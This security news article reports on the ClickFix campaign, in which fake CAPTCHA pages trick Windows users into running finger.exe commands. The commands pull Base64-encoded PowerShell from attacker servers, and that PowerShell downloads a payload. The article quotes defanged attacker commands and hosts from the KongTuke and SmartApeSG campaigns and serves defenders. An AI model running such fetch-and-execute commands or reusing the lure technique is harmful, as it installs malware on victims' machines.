A novel social engineering campaign, dubbed ClickFix, has been identified, which cleverly employs an old Windows command-line tool, finger.exe, to install malware on victims’ systems.
This attack begins with a deceptive CAPTCHA verification page, tricking users into running a script that initiates the infection process.
The technique has been in use since at least November 2025 and continues to be a persistent threat.
The attack’s reliance on the finger protocol, a legacy networking tool for retrieving user information, is a unique characteristic.
Threat actors are abusing this seemingly harmless utility to fetch malicious payloads from remote servers.
This method allows the attackers to bypass some security measures that are not configured to monitor or block traffic over the finger protocol’s designated TCP port 79.
Internet Storm Center analysts/researchers noted this activity and have been tracking two prominent campaigns employing this technique: KongTuke and SmartApeSG.
Fake CAPTCHA pages
Both campaigns leverage fake CAPTCHA pages to lure users into executing the initial finger command, demonstrating a shared methodology.
.webp "New Clickfix Attack Exploits finger.exe Tool to Trick Users into Execute Malicious Code 3")
The continued use of this tactic highlights its effectiveness in environments where legacy protocols are not adequately secured.
Upon execution, the finger command contacts a command-and-control server. For instance, the KongTuke campaign uses a command like finger gcaptcha@captchaver[.]top.
.webp "New Clickfix Attack Exploits finger.exe Tool to Trick Users into Execute Malicious Code 4")
The server responds with a PowerShell command containing Base64 encoded text, which then executes on the user’s machine to carry out further malicious activities.
The SmartApeSG campaign operates similarly, using a command such as finger [email protected][.]108 to retrieve a script.
.webp "New Clickfix Attack Exploits finger.exe Tool to Trick Users into Execute Malicious Code 5")
This script then downloads and executes a malicious file, which shows the script retrieving a file named yhb.jpg that contains the malicious payload.
This multi-stage process allows the malware to establish a foothold on the compromised system.
While corporate networks with explicit proxies may block TCP port 79, many systems remain vulnerable if this port is not explicitly blocked, making these attacks a continued concern for network administrators.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
